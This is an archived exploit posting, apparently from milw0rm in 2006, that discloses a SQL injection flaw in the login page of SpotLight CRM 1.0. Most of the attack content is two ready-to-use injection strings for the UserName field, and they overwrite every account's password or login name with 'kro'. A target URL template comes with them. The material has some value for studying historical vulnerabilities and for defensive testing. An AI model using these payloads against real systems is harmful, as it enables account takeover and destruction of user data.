28 lines
No EOL
648 B
Text
28 lines
No EOL
648 B
Text
*************************************************************************************
|
|
# Title : SpotLight CRM 1.0 (login.asp) | Remote SQL Injection Vulnerability
|
|
# Author : ajann
|
|
# Contact : :(
|
|
# $$$ : $2,499
|
|
|
|
*************************************************************************************
|
|
|
|
|
|
[[SQL]]]
|
|
|
|
###http://[target]/[path]//login.asp=[POST SQL]
|
|
|
|
Example:
|
|
-> All User UserName And Password Changed "kro"
|
|
|
|
// login.asp UserName: ';update login set password='kro'--
|
|
// login.asp UserName: ';update login set loginName='kro'--
|
|
|
|
[[/SQL]]]
|
|
|
|
"""""""""""""""""""""
|
|
# ajann,Turkey
|
|
# ...
|
|
|
|
# Im not Hacker!
|
|
|
|
# milw0rm.com [2006-12-09] |